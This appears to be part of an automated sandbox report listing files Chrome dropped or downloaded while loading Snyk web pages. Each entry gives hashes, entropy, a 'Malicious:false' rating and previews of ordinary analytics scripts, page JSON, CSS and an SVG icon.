                                                                                                                                                                                                                                                                                                              Preview:.....C.............................+......+&.%#%.&D5//5DNB>BN_UU_wqw......C.............................+......+&.%#%.&D5//5DNB>BN_UU_wqw.........O...."..................................................................................T.H...,V..9yx9..v.=.....^.<...z.<....|'..._.~m............V.i.Ze.e&..i...fjK.K..FT.FT%T...%........PXJ.@....(....".iP..AAAK.f.e.e..U.QU.ETQ..hE$Q.E.i....m..PZ......i...NTq9I...nDu,z.F.X...L.|{....y........z...........^......?....x....4.-3$....-L..73L..r...Ib.\..(.2....K %BP.. %K..P.....P..h..)(..(((4...o7...................b*.,[e...O.o..93<..7N3...........g..MN.0........).J..6./c.....w.y..W..x...c..<^...o...t.}...}.l[..a-e.e...b..Z.fi.f.u.,Teb...Y...JB..5,X.%....%..X.(.....`...%T...[Q...Q.Ynu...UET.QVETUE$Ue...Q.QQ...Q.F........o.../......g.>..:..:..|..........1...;F.-.jR..N..c<{=.{....y......y^....._.?..>...z...(...,.7*.-L.*Y53s4.3R\.d....d.T.Y5%....P.".Ij"..%.J..@ .(..,...**.@.......@.4.H.".*...(. .@....IVYZ.[..].W[.t.#L.W..
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1724
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.888866409435775
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:YmTHm6S31HfVhOGM+6bqFabnLFKE6pSYEy5IDiDu6:tTy/OGM+iqFaVKRMYE9X6
                                                                                                                                                                                                                                                                                                              MD5:6B5F3B0ECF9843596807E610D535A0AA
                                                                                                                                                                                                                                                                                                              SHA1:18DCF9F3509BFCF96C70170514AEC51779A2701C
                                                                                                                                                                                                                                                                                                              SHA-256:3F76288D6FE9B9C1340BA0FE7FB295FB0988C143667B7B7A2C8A93FFDFF68C39
                                                                                                                                                                                                                                                                                                              SHA-512:DEAEC8648E808BC1F112CFCD1AEB8E97FAF43FA9BB759D35D564A33B569EFF3858BA71A7E52BD8B52ADA704E874F06BD9FA7726793F84494878218E63D951996
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="10.7852" x2="68.1675" y1="3.99999" y2="17.5669"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#145deb"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="60" x2="25.0232" y1="22" y2="28.6732"><stop offset="0" stop-color="#43b59a"/><stop offset="1" stop-color="#ffe792"/></linearGradient><g clip-rule="evenodd" fill-rule="evenodd"><path d="m27.5 59.9867c-.1247.0177-.2513.0177-.376 0-15.7794-5.2786-23.12277-15.9992-23.12277-33.7929v-13.9832c-.01186-.2571.06238-.5108.21116-.7216.14878-.2107.36372-.3668.6113-.4437l22.32381-6.99163c.2295-.07156.4755-.07156.705 0l22.3238 6.99163c.2476.0769.4625.233.6113.4437.1488.2108.223.4645.2112.7216v8.145c-.6217.7049-.9988 1.6306-.9988 2.6444v4c0 .0195.0001.039.0004.0584.0002.014.0005.0279.0008.0419-.3235-.0658-.6583-.1003-1.0012-.1003h-5c-
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9375)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):287658
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.560819586055411
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:FXfRhbIGc3kWh2V1Zc0xSJcEjCPfrgixeOYH2hnHas3rOXk9nqhif:FvRo3k42DyvvioXjs3qXk9nqhm
                                                                                                                                                                                                                                                                                                              MD5:8AAB983C18B63B64A3AB3FAF070D5634
                                                                                                                                                                                                                                                                                                              SHA1:75D8647176C2445473610EC4F1F7B7C8DDBE36F5
                                                                                                                                                                                                                                                                                                              SHA-256:3D2E80341B6AA161A29B674EA7E88E78C960A512A42FA43DF5F96360D73F574C
                                                                                                                                                                                                                                                                                                              SHA-512:D7173DAFB17C8C82F92A7F6FF7F56FAE56EF0C850A50B8CBF01793749AF011C1AD1552CDFED38419C65410088CFBE6B306B73690A905BB6754515227F9CAEE3B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtm.js?id=GTM-W4LKKNL&l=dataLayer
                                                                                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"25",. . "macros":[{"function":"__e"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"confidence_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"company_name_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"domain_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"name_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"region_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"country_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"state_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):17
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.734521664779752
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Wd4M:IB
                                                                                                                                                                                                                                                                                                              MD5:0C8B00B4F600A84E8910C15984A27B9F
                                                                                                                                                                                                                                                                                                              SHA1:3DABC5AB449517DE463375F1D1367E808B91D566
                                                                                                                                                                                                                                                                                                              SHA-256:F454E98843E4585608FF421E6FCC613C10AE01AE56C2EFF0999EA222AB4A3E00
                                                                                                                                                                                                                                                                                                              SHA-512:04F5EEB9193317B2C31B4E1F09296695FF882AD4163413D0420342D9D5CAF3A249C00932BEC512D31D5B4E6D501439E636E13781CC66D6B0BC5B1649DF25D9A3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:jsonp386460(null)
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (54099), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):54126
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.166043855605311
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:a0vuvcEFkGk1ubsQ34kGkEBbw5rwgAyzhoEMVvpxl+fm9re9PE8waMe:NEFkGk1uB34kGkEm5rWXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:58B35F914157E308E93D27ADFD00977A
                                                                                                                                                                                                                                                                                                              SHA1:F76B408EEA0C7F2C03D352716AE160C24EC85014
                                                                                                                                                                                                                                                                                                              SHA-256:A2A72F19A7FECB600D45A24EA5383308A381E7F8E10EAA0FA2C5AC5ED7DE2DAE
                                                                                                                                                                                                                                                                                                              SHA-512:F911C648CAF14FA03276B51548B9C607871EE8D6D2784CD4D5A3D4E7ADD59CE930BF8A8DC485EBCFA962AD3CD93A02DEEBB6BD7050AB973D6A9549D729C12F98
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5T18C5NkVlCQYogGTmD4hK","type":"Entry","createdAt":"2022-12-13T01:18:40.347Z","updatedAt":"2023-06-08T18:52:34.881Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":26,"revision":6,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Security Leaders page","title":"Resources for Security Leaders | Snyk","slug":"security-leaders","uri":"security-leaders","pageLocalization":["de","ja","fr"],"featuredImage":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1646599294/wordpress-sync/feature-resources-for-todays-and-tomorows-security-leaders.png","tags":null,"type":"upload","bytes":107309,"width":1200,"format":"png","height":628,"context":{"custom":{"guid":"6eb2ea205a542cceb3ec2a9ff221c9bb","caption":"feature-resources-for-
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5958), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):5958
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.342284729795756
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:eUCLSrIxIONHV3MIKtlYrZ47FMdExyKan1/Lw8K:GLSIGONHVcP+VWhna1/M8K
                                                                                                                                                                                                                                                                                                              MD5:CDD91066649969BE0F00F607A9AD9249
                                                                                                                                                                                                                                                                                                              SHA1:C020CA292A023D3692A9FADAA74CE717C7F1F37E
                                                                                                                                                                                                                                                                                                              SHA-256:6A2608C98AC9431238BF683253A4ECD7811584912217A73D16963017DF521608
                                                                                                                                                                                                                                                                                                              SHA-512:0EC946227AFB6C8D3BAC9FCE553002F06DF9DECC9A9BE6604FB05AC761406E7B953146CAF3095AE96EB6E90DDD8B81C7660A35C3CF95249E2DDCCB9ACEEA6B3F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5185],{8241:function(e,l,i){i.d(l,{d:function(){return n},x:function(){return d}});let d=function(e){let l=arguments.length>1&&void 0!==arguments[1]?arguments[1]:5,i=1;switch(!0){case e>0&&e<l:i=e;break;case e>=l:i=l;break;case l>=12:i=12}return i},n=e=>{let l={hasMaxWidth:!1,itemPadding:"extra-large",gap:"extra-large"};switch(!0){case e<=2:l.hasMaxWidth=!0;break;case 4===e:l.itemPadding="medium",l.gap="medium";break;case e>4:l.itemPadding="medium",l.gap="small"}return l}},75185:function(e,l,i){i.r(l);var d=i(85893),n=i(4908),o=i(96098),a=i(41828),t=i(23751),v=i(74129),r=i(86943),s=i(8241);l.default=function(e){var l,i,u,c,b,p,m,h,f,k,w,g,G,x,P,y,I,T,C,j,S,N,U;let{fields:B,sys:M}=e,{backgroundColorScheme:Z}=(0,t.tv)(),A=(0,s.x)(null==B?void 0:null===(l=B.gridItems)||void 0===l?void 0:l.length,null==B?void 0:null===(u=B.appearance)||void 0===u?void 0:null===(i=u.mediaCardGrid)||void 0===i?void 0:i.maxCols),E=(0,s.d)(A
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65498), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):141355
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.071058930130792
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:UOlZq6mV9f9D7CxAdg1z33dOs2ZqMSDteA:4id84DgA
                                                                                                                                                                                                                                                                                                              MD5:6DD59CAD0F667A41EB3828314E849C6E
                                                                                                                                                                                                                                                                                                              SHA1:5494B76D27502331340BCB8B1F41E6B8CFA58E8E
                                                                                                                                                                                                                                                                                                              SHA-256:F1960852E28536A56CF8279088C71C27945F8A49487FAD266487210071936B76
                                                                                                                                                                                                                                                                                                              SHA-512:DF0B9E65FEE0842F4521B2003AD1760C308F517B8B1DADEC433FD919ACAC88BF58B24B846BC54FFD56E46E05972D34AF00E69890C881010A030C7FAA93ABE293
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5sjhnMWh8fY9eBR9cglw0m","type":"Entry","createdAt":"2022-11-04T18:25:43.667Z","updatedAt":"2023-09-23T17:35:40.142Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":55,"revision":14,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Products - Software supply chain security solution page","title":"Software supply chain security solution | Snyk","slug":"software-supply-chain-security","uri":"solutions/software-supply-chain-security","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3VViJ1f0WvmuP2n8i88ALS","type":"Entry","createdAt":"2022-11-04T18:25:43.830Z","updatedAt":"2024-07-18T22:34:1
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4258
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.980462729700634
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:0BIajxCmpAKjkZWPpyEqZlHDV/yt6kBqC:KCmpAOMLDNq6U
                                                                                                                                                                                                                                                                                                              MD5:21AD214C0BDBD67E1C6AA29D8869B520
                                                                                                                                                                                                                                                                                                              SHA1:79930A4AE379FAB65E27E71041DECB66C20EAB55
                                                                                                                                                                                                                                                                                                              SHA-256:E845D5373FDA432CE99860FC2FD6FB48EE94A0EC4C37120391299109498797C5
                                                                                                                                                                                                                                                                                                              SHA-512:4C2F080FD9082774B61048436E10596DAF9D67B40623643F18E61288A7EA97CAC024C5621E67FF0C314CF08225AF8D809A587FBAE7FC365159E49A09E8DFBA66
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"integrations":{"Google Analytics":{"anonymizeIp":false,"classic":false,"contentGroupings":{},"dimensions":{"Author":"dimension4","Post Categories":"dimension5","Content Tags":"dimension6"},"domain":"","doubleClick":true,"enableServerIdentify":true,"enhancedEcommerce":false,"enhancedLinkAttribution":false,"identifyCategory":"","identifyEventName":"","ignoredReferrers":[],"includeSearch":true,"metrics":{},"mobileTrackingId":"UA-69111857-1","nameTracker":false,"nonInteraction":true,"optimize":"GTM-K59728M","preferAnonymousId":false,"protocolMappings":{},"reportUncaughtExceptions":false,"resetCustomDimensionsOnPage":[],"sampleRate":100,"sendUserId":true,"setAllMappedProps":true,"siteSpeedSampleRate":1,"topLevelContextMapping":false,"trackCategorizedPages":true,"trackNamedPages":true,"trackingId":"UA-69111857-1","useGoogleAmpClientId":false,"versionSettings":{"version":"2.18.5","componentTypes":["browser","ios","android","server"]},"type":"browser","bundlingStatus":"bundled"},"AdWords":{"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (64015), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):64015
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.209365259762595
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:sprVgXJF9bKTcCkTETu+TzPuTmTOT7T4TeTqTXTBTPhmkTBmkTFTrDTlTcT0TQ18:bb2UEhDymTSvwCWjJPlFVrn1MUQJI
                                                                                                                                                                                                                                                                                                              MD5:EAAA8F5B073BB1B854180A7BC6B205D3
                                                                                                                                                                                                                                                                                                              SHA1:A6F5D896202AE511E36B36E5EED16BA2AD5A3E19
                                                                                                                                                                                                                                                                                                              SHA-256:69597A264360B7092D18CC5BC07725665200250012B595810D71FE8F83ED89E5
                                                                                                                                                                                                                                                                                                              SHA-512:5E3E1436EF6008ED7DA0AF19C07ADFC141B87B64607BCB2B9BF4886F71CB7DEA15A0A47DCD68811A307833212013094E90B0840C0E0DCF85078BB81AFB109144
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/9371-f3c21e360213617c.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9371],{74129:function(e,t,n){var i,r,o,a,d,s,p,l,y,f,c,u,E,m,T,L=n(67294),S=function(){return(S=Object.assign||function(e){for(var t,n=1,i=arguments.length;n<i;n++)for(var r in t=arguments[n])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};"function"==typeof SuppressedError&&SuppressedError;var b="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:void 0!==n.g?n.g:"undefined"!=typeof self?self:{},I={},O={};Object.defineProperty(O,"__esModule",{value:!0}),O.BLOCKS=void 0,(i=c||(O.BLOCKS=c={})).DOCUMENT="document",i.PARAGRAPH="paragraph",i.HEADING_1="heading-1",i.HEADING_2="heading-2",i.HEADING_3="heading-3",i.HEADING_4="heading-4",i.HEADING_5="heading-5",i.HEADING_6="heading-6",i.OL_LIST="ordered-list",i.UL_LIST="unordered-list",i.LIST_ITEM="list-item",i.HR="hr",i.QUOTE="blockquote",i.EMBEDDED_ENTRY="embedded-entry-block",i.EMBEDDED_ASSET="embedded-asset
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (31410), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):31410
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.39987368207557
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:KaHMD5DU8gZDYLY/j/KA5YotDREoqNF/DA0YttKREtqIpCMk2UOZhWUgeyDjXNth:K9Ds0VEz5zR+h
                                                                                                                                                                                                                                                                                                              MD5:FBA1C16A1084513CF2DF00894745CA99
                                                                                                                                                                                                                                                                                                              SHA1:E03981D772CBDAC7E6D953C823793BA161FCFE32
                                                                                                                                                                                                                                                                                                              SHA-256:8FFF70900A81C98901A969D789D6B778F8453C9A10FB99F6C6461400F0E3E9EA
                                                                                                                                                                                                                                                                                                              SHA-512:721C87540FA9F2C2D148CD1D01B55060034E4643CC1FAE06F1040A4CB1FA8143E8462F13D77F584C201F7A75059F96649EA1A830137EFF5152593244041136C7
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/assets/css/8.6ac3976b.chunk.css
                                                                                                                                                                                                                                                                                                              Preview:.drift-widget-avatar{-webkit-border-radius:50%;-moz-border-radius:50%;border-radius:50%;overflow:hidden;border:2px solid #fff;height:56px;width:56px;-webkit-background-size:cover;-moz-background-size:cover;background-size:cover;background-position:50%}.drift-widget-avatar.drift-widget-avatar--small{width:28px;height:28px;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none}.drift-widget-avatar.drift-widget-avatar--medium{width:46px;height:46px;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none}.drift-widget-landingpage-layout .drift-widget-avatar.drift-widget-avatar--small{width:42px;height:42px}@font-face{font-family:Brandon;font-style:normal;src:url(https://js.driftt.com/deploy/assets/static/fonts/BrandonText-Regular.woff)}@font-face{font-family:Brandon;font-weight:700;src:url(https://js.driftt.com/deploy/assets/static/fonts/BrandonText-Bold.woff)}@font-face{font-family:Lato;font-style:normal;font-weight:400;font-display:swap;src:url(https://js.driftt.com/deploy/ass
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.950212064914747
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Sn:S
                                                                                                                                                                                                                                                                                                              MD5:D97623D172F087D9640DA9ACD38830FF
                                                                                                                                                                                                                                                                                                              SHA1:515BD358BB7D990930F0E2B3DE399DB1787A2567
                                                                                                                                                                                                                                                                                                              SHA-256:FE04A9DC88D3F3BE8D4F6BC63A9A80F45A4C6D8460E7551DAB849457C091920A
                                                                                                                                                                                                                                                                                                              SHA-512:CE6A1969F698A616663F1A19CCFA12A37A4F6D782432D8A08AEB7879EFD3E2BECF168422EA66BC47E74F6BA865EFAAE6EABE3C4FABA280D7A21F3A94D7C55DA1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<p></p>
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):285102
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.560945041408659
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:5jRhbIGc3kWhZT1Zc0mSJcEjCPfrgixeOYH2hnHwCFrOXk9n9tjV:NRo3k4ZJFvvioX5CFqXk9n9th
                                                                                                                                                                                                                                                                                                              MD5:8134EE2D15C4CE122BDD3B5F1F6B13D9
                                                                                                                                                                                                                                                                                                              SHA1:EF6DD2A60CF1E279EEFBDF54E3B651AAF6D6F8C1
                                                                                                                                                                                                                                                                                                              SHA-256:6CCA319E34C005A4FBE8059FA4B1D9C3E7DA815525B52B5BDA194FD9E06FD041
                                                                                                                                                                                                                                                                                                              SHA-512:99DABC47AC67BFB0B8CE899317B6F1CB666B73F1ED7B8E64D7880659EAF543DB0BFC0E4FA45442091468F0FF40196D5C0232341222A90A090828FF3A2423179F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/destination?id=AW-923832244&l=dataLayer&cx=c
                                                                                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-923832244","tag_id":16},{"function":"__ogt_cps","priority":6,"vtp_cpsAds":true,"vtp_cpsPlaystore":true,"vtp_cpsYoutube":true,"vtp_cpsSearch":true,"vtp_cpsMode":"SOME","vtp_cpsShopping":true,"vtp_cpsMaps":true,"tag_id":8},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_au
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):133422
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.955609429117514
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:zW1GElyD5niq4dCmRC5cYQAgFi69ntXPQLGBq15TVaCM0M0WwJiVKxCtx2JDvwxo:Vm1tqM8iAYut
                                                                                                                                                                                                                                                                                                              MD5:7397F55DBF3B3FE70093C2C3D4DE883A
                                                                                                                                                                                                                                                                                                              SHA1:94F2AD2DA5236AE58274356024F7C797F1E340DB
                                                                                                                                                                                                                                                                                                              SHA-256:0F59031F1817F80406B42AA0E0F6BE5952E25CB36DE649D84AECDDBF94E7B0E2
                                                                                                                                                                                                                                                                                                              SHA-512:33D3531527071AAACCDECFDFC7B23CC44001FD37C88EF989F1B699997EA1C8C860A549B42E29169AD5B84492BD56103BA0CB7B2922A554BC484016D7883A7120
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"templates":[{"adminSettingsId":[],"dataAttributes":[],"dataProcessors":[],"dataProcessor":"Sticky UTMs","dataPurposes":[],"domAttributes":[],"domElements":[],"domKeys":[],"nameOfProcessingCompany":"","addressOfProcessingCompany":"","descriptionOfService":"The sticky utm cookie captures any utms on the Snyk url a visitor first visits and has the utms follow the visitor during this specific session. If the visitor fills out a form or creates a Snyk Account/User, the sticky utms are captured in that activity which helps with accurate analytics for Snyk campaigns.","technologyUsed":[],"languagesAvailable":["en"],"dataCollectedList":[],"dataPurposesList":[],"dataRecipientsList":[],"legalBasisList":[],"retentionPeriodList":[],"subConsents":[],"cookieNames":[],"templateId":"6ySvKQ7jnpjp6y","updatedAt":"2024-05-14T18:33:26.348Z","language":"en","version":"1.1.0","isLatest":true,"isShared":false,"isHidden":false,"type":"custom","shareCustomConsent":"hidden","linkToDpa":"","defaultConsentStatu
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, was "tmpnxgs__sw", last modified: Tue Sep 17 11:17:00 2024, max compression, original size modulo 2^32 723647
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):197282
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.998361367101362
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:RFdkypYXFM57h1HXu06otoRTp5QiCej9Om:J98in13uBoq8iC89
                                                                                                                                                                                                                                                                                                              MD5:98BBE9F2D87D17908A6757F6D82CACD4
                                                                                                                                                                                                                                                                                                              SHA1:AD6CD0F0A49C630E94DEDA2CE51B4A2DB36D0F7E
                                                                                                                                                                                                                                                                                                              SHA-256:7EB6859FF68B9F5AAE69CD8D394924A3FBCB1C9754300939F2F01A5D3C43F2BC
                                                                                                                                                                                                                                                                                                              SHA-512:BE22A0CD266FB104FE539BCCF18067BF6F59C63EA6F52B03C25BDE17D28E0E1F1EDC77B9E27AB006D00C1A816DC81445FBBDD7E173B6BA37C507055340A7D295
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
